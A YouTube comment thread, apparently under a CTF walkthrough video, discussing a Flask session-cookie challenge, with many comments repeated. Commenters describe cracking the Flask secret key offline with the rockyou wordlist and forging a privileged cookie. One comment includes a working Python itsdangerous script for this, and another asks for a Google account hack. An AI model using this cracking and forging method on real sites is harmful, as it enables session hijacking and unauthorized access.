Just a small comment, you could just offline brute force the secret key using the original session cookie you get from the site and compare it to what you generate, this way you don't need to brute force the remote server and it will make brute forcing faster (because it's not over the network). Aside from that, great video as always, thanks alot for what you are doing for the community, you are awesome!
Ah crap, you're totally right. That would have been a much better approach and not end up hammering the website ("no bruteforce"). Good call -- I'll know to do that for next time, thanks so much! And thanks for watching!
Also we can observe the header values , server:meinheld/1.0.1 , so we can deduct that certainly at the backend a sandboxed python backend must be at work , this could be an python sandbox vulnerability or SSTI .
This is awesome. I like the way you get going with things and find out the right path. I like your python skills man. I do love python but i am merely a beginner. Keep doing such videos. Thank you very much 😊
I just discovered you some days ago and I love your content. It's not the area I work, but who knows in future? Anyway, knowledge is knowledge, right? Keep up the good work.
I really loved your videos.. its worth watching.. kudos to your programming skills.. keep doing more.. keep entertaining and encouraging us.. Love from INDIA
I thought for sure this was going to be a situation where they don't verify the signature, so you could just set the flagship key to true in Burp and be on your way. But it was great seeing your python script!
Ah crap, you're right. That's a better way to do that, so it's not bruteforcing the main website. Good call -- I'll know to do that for next time, thanks so much! And thanks for watching!
Any possibility of going over how to complete this without brute force? I'd be very interested in seeing that :) Also, yeah, a lot of people have mentioned it already, but offline has verification probably would've been cleaner. Overall, great vid. Love your content
Yeeeeahhh I suck, I see from reading all the comments here, it's a better move to try and verify the signature offline. I definitely know to do that for next time. Thanks for watching!
@@GeekBatman He had asked about brute forcing on the server side. The response was that he didn't need to. He ignored that and pushed on the server. but, again, he didn't *need* to, because the answer was already on his desktop. So, he did need to use brute force, but not against the server. The answer he got was correct. The question he asked could have been reworded. understand now?
I did those Pico ctf flask ones. You don't actually need to send it to the server over and over again. Because you have a cookie, you can just take the data out of the cookie then sign it with all of the Rock you passwords, and check to see if the token you get from signing it is equal to the token the website gave you. Once you have the secret key that way, then you can forge a different one and send only one request back to the server. It's still brute-forcing, but you don't need to hammer the server. Also it's like a million times faster to do it locally. If the password had been the 10 millionth one in rockyou.txt, hammering the server would take too long. Am I explaining that clearly?
You can bruteforce it locally by doing this: from itsdangerous import Signer import hashlib #Load rockyou.txt wanted_signature = b'EmEAYEBaTe9gNwYCeG86ffR98oM' #The last part of the cookie (SIGNATURE) encoded_plus_timestamp = "eyJmbGFnc2hpcCI6ZmFsc2UsInVzZXJuYW1lIjoicGx6c3ViIn0.XqM9Yw" #First part of the cookie (ENCODED_STRUCTURE.ENCODED_TIMESTAMP) for password in rockyou: s = Signer(password, salt="cookie-session", key_derivation="hmac", digest_method=hashlib.sha1) #Found the params though some source digging :) if s.get_signature(encoded_plus_timestamp) == wanted_signature: print(f"Secret key is: {password}!") break This is much faster and there is no need to hammer the server :)
@@shadowKamiyama Yeah, I just use my DELL XPS 15 laptop. When I am at my desk I connect to an external monitor, and I use Ubuntu as my daily driver operating system.
Ha, I should get the Python "Black" linter back to being integrated into Sublime Text so it switches all that nonsense and corrects me automatically ahaha.
I hate these kind of challenges...because it always boils down to "do you have the correct list". You are not learning anything or any "new technique" :-/
All I heard through out video is just cookie🍪 cookie🍪 cookie🍪 and some forging sh*t that's it, cause I am a noob not your problem @johnHammonh though 😘
Alright this was my last resort... I need someones opinion or help. I am like 50% positive that there is a message that I need to decode in an image that I have. Im only 50% positive because im a newb, and I think that it might be using zero width/ white space... But this bitch is latin characters and I am not advanced enough to even know if I am on the right track.. ive been going at it for almost 2 weeks. I cant find anyone on reddit who is willing to take a look.. I just need someone to tell me if there is or is not something weird with this image's code. Hopefully someone sees this.. or im SOL. Thank you. Much love.
Just a small comment, you could just offline brute force the secret key using the original session cookie you get from the site and compare it to what you generate, this way you don't need to brute force the remote server and it will make brute forcing faster (because it's not over the network).
Aside from that, great video as always, thanks alot for what you are doing for the community, you are awesome!
Was thinking this the whole time
Ah crap, you're totally right. That would have been a much better approach and not end up hammering the website ("no bruteforce"). Good call -- I'll know to do that for next time, thanks so much! And thanks for watching!
Hi, i am wondering, the reason we can brute-force this secret_key is because signature is invalid, right?
@@trieulieuf9 no, that's not why you can brute force it. You can brute force it because the site is designed in a way that lets you, like most CTF s.
I’m learning so much from this channel. Thanks so much.
you make me wanna go learn python so hard right now after seeing the power of this programming language
Thanks John!
Wonderful video thanks, this walkthrough helped me to solve picoctf "more cookies" challenge which is based on flask cookie...
Also we can observe the header values , server:meinheld/1.0.1 , so we can deduct that certainly at the backend a sandboxed python backend must be at work , this could be an python sandbox vulnerability or SSTI .
This is awesome. I like the way you get going with things and find out the right path. I like your python skills man. I do love python but i am merely a beginner. Keep doing such videos. Thank you very much 😊
I just discovered you some days ago and I love your content. It's not the area I work, but who knows in future? Anyway, knowledge is knowledge, right? Keep up the good work.
I really loved your videos.. its worth watching.. kudos to your programming skills.. keep doing more.. keep entertaining and encouraging us.. Love from INDIA
I thought for sure this was going to be a situation where they don't verify the signature, so you could just set the flagship key to true in Burp and be on your way. But it was great seeing your python script!
Very new to pretty much all of this ... seems to slowly makes sense very fun to watch and informative 👍
Learned a lot. Appreciate you
You could have verified the signature offline, only the correct secret will generate a valid signature.
Ah crap, you're right. That's a better way to do that, so it's not bruteforcing the main website. Good call -- I'll know to do that for next time, thanks so much! And thanks for watching!
Any possibility of going over how to complete this without brute force? I'd be very interested in seeing that :)
Also, yeah, a lot of people have mentioned it already, but offline has verification probably would've been cleaner. Overall, great vid. Love your content
Awesome man ... thank you
Thanks so much for watching!
Awsome
The Cookies must flow...
❤️
Great content as always jon
Nice demo. Great!
Thanks so much for watching!
I thought you said there was no brute forcing? Did I mishear?
Yeeeeahhh I suck, I see from reading all the comments here, it's a better move to try and verify the signature offline. I definitely know to do that for next time. Thanks for watching!
Don't get me wrong I enjoyed watching your process. I just heard one thing and saw another haha. Cheers for all the good videos!
@@GeekBatman He had asked about brute forcing on the server side. The response was that he didn't need to. He ignored that and pushed on the server. but, again, he didn't *need* to, because the answer was already on his desktop. So, he did need to use brute force, but not against the server. The answer he got was correct. The question he asked could have been reworded. understand now?
Great video Mr Hammond 👍 thanks
Thanks so much for watching!
That Is Amazing
Great vid!
Nicee. i wasnt able to do it. Now i know how to do it :)
I did those Pico ctf flask ones. You don't actually need to send it to the server over and over again. Because you have a cookie, you can just take the data out of the cookie then sign it with all of the Rock you passwords, and check to see if the token you get from signing it is equal to the token the website gave you. Once you have the secret key that way, then you can forge a different one and send only one request back to the server.
It's still brute-forcing, but you don't need to hammer the server. Also it's like a million times faster to do it locally. If the password had been the 10 millionth one in rockyou.txt, hammering the server would take too long.
Am I explaining that clearly?
something nice
Ha! Thank you for watching!
How in the hell did you learn all this stuff? Just WOW. Very impressive. I feel dumb, just watching. lol
Learn programming. Code a web app. Then you know how all works together and what possible attack vectors could be.
Is it possible to solve those challagnes today? Or the competition has ended and they are no longer available?
It looks like the challenges are still available here: ctf2020.hackpack.club/challenges
Thanks for watching!
Any websites like THM, HTB and HackPack CTF? thx.
You can bruteforce it locally by doing this:
from itsdangerous import Signer
import hashlib
#Load rockyou.txt
wanted_signature = b'EmEAYEBaTe9gNwYCeG86ffR98oM' #The last part of the cookie (SIGNATURE)
encoded_plus_timestamp = "eyJmbGFnc2hpcCI6ZmFsc2UsInVzZXJuYW1lIjoicGx6c3ViIn0.XqM9Yw" #First part of the cookie (ENCODED_STRUCTURE.ENCODED_TIMESTAMP)
for password in rockyou:
s = Signer(password, salt="cookie-session", key_derivation="hmac", digest_method=hashlib.sha1) #Found the params though some source digging :)
if s.get_signature(encoded_plus_timestamp) == wanted_signature:
print(f"Secret key is: {password}!")
break
This is much faster and there is no need to hammer the server :)
can you make a setup video pls ?
Setup of what? My hardware, recording equipment? Or like, software and operating system and tools?
@@_JohnHammond your hardware and your software what use it that make sense ?
@@_JohnHammond and do you used a laptop ?
@@shadowKamiyama Yeah, I just use my DELL XPS 15 laptop. When I am at my desk I connect to an external monitor, and I use Ubuntu as my daily driver operating system.
Great vid, but for the love of God please choose either single or double quotes
Ha, I should get the Python "Black" linter back to being integrated into Sublime Text so it switches all that nonsense and corrects me automatically ahaha.
I hate these kind of challenges...because it always boils down to "do you have the correct list". You are not learning anything or any "new technique" :-/
All I heard through out video is just cookie🍪 cookie🍪
cookie🍪 and some forging sh*t that's it, cause I am a noob not your problem @johnHammonh though 😘
Alright this was my last resort... I need someones opinion or help. I am like 50% positive that there is a message that I need to decode in an image that I have. Im only 50% positive because im a newb, and I think that it might be using zero width/ white space... But this bitch is latin characters and I am not advanced enough to even know if I am on the right track.. ive been going at it for almost 2 weeks. I cant find anyone on reddit who is willing to take a look.. I just need someone to tell me if there is or is not something weird with this image's code. Hopefully someone sees this.. or im SOL. Thank you. Much love.
So many Code thieves..huh!!! 🤓🤡
Lol if the key was the flag it would be cool
If the key was the flag it wouldn't be in any wordlist, so good luck bruteforcing it XD
@@_sp3149 lol yea that what i was saying
Bro can you upload Google account password attack or hack please